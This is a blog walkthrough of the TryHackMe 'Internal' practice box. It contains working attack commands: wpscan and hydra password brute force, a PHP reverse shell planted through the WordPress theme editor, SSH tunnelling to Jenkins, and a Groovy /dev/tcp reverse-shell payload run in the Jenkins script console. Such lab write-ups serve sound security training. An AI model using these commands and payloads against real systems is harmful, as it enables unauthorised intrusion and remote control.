TryHackMe : Internal Walkthrough

This week , TryHackMe launched the box Internal , and it’s probably one of the best boxes I have faced so far. The sheer diversity of the box is enough to pump you up and the veterans of TryHackMe will love this box.

First things first , add the IP of the Machine into the /etc/hosts folder of your machine.

The next step is Nmap Enumeration. Scanning the host reveals nothing unusual, just the usual Port 22 and Port 80. Move over to Port 80 first where you are greeted by a Apache2 Ubuntu Default Page.

Well this calls for a gobuster scan. Use the common.txt wordlist for enumeration. (You can use other extensive wordlists but you won’t get any new results)

gobuster dir -u internal.thm -w /usr/share/wordlists/dirb/common.txt

There are some very interesting entries in here. Have a look at phpmyadmin , blog and wordpress.

Well since there’s wordpress at play , it’s advisable to always enumerate the site via wpscan. First , enumerate the site for potential users using the command :

wpscan --url internal.thm/wordpress/ -e u

The scan reveals the presence of the user : admin. Use the same tool again , combined with the trusty old rockyou.txt and try to bruteforce your way in.

Once you have got the password login to gain access to the control panel. However , you might be redirected to the login page again , even after putting in the right credentials. To get a closer look , intercept the request with burpsuite.

As you can see, we are being redirected back to the login page. Remove this section (highlighted in the image) and forward the request and you should be logged in.

Now you would want to grab a PHP Reverse Shell now. If you are using Kali/Parrot Security OS you should already have it or else grab the one from Pentest Monkey. Head over to the Theme Editor , and paste the reverse shell code in place of the 404.php (Remember to change the IP and Port in the original script).

Fire up a netcat listener on the port assigned in the reverse shell and wait till you get a connection back.

nc -lnvp 6969

At this point , there are a lot of interesting things you can do. Start by downloading linpeas onto the machine and execute it.

Here , you can find the password to phpmyadmin. Also note the running services. At this point I thought that the phpmyadmin could be leveraged to gain root access but that’s a dead end. The key , however , lies in the /opt directory.

Yay you got the credentials for the user aubreanna ! SSH your way in using the credentials you just got and snag that user flag ! (You can use linpeas as aubreanna as well but you there’s nothing new or interesting )

With that out of the way , notice there’s an interesting text file in our home directory by the name of jenkins.txt , which contains some interesting information.

Apparently , we have Jenkins running over at port 8080. Use SSH tunneling to access this on your own machine so that you can use the various tools on it.

ssh -L 6969:172.17.0.2:8080 aubreanna@internal.thm

Once connected , head over to port 6969 (or whatever you set it as) on your localhost and there you should find the Jerkins Service running.

We don’t know any usernames and password so we’ll use some common username like admin and bruteforce our way in with hydra and rockyou.txt as follows (You can also use hydra to bruteforce the usernames but that would take a really really long time) :

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 6969 127.0.0.1 http-post-form “/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password”

Once you get the password , login to Jenkins using the credentials you just got. Once in , navigate to the script console which allows you to execute commands.

Fetch a Java reverse shell from Pentest Monkey and run it on the console :

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Again , spawn a netcat listener to catch the incoming connection. You should get a shell back as the user jenkins.

Exploring the home directory of the user jenkins reveals a lot of intimidating files and folders, like the file secret.key and the directory secrets , but that’s not what you are looking for :”)

What you are looking for is in the /opt folder. Move over to the directory and cat out the text file to reveal some information which would make you very happy !

You got the root password !!! Use the newly found credentials to change user to root and get the final root flag !

With this , we complete another box. Honestly , the SSH tunneling part makes this box very unique and I had great fun in solving it ! Special Thanks To Joe Helle aka The Mayor for all the help and support during solving the box. With this we come to the end of another box ! Follow me on Instagram and LinkedIn , till then , Peace :D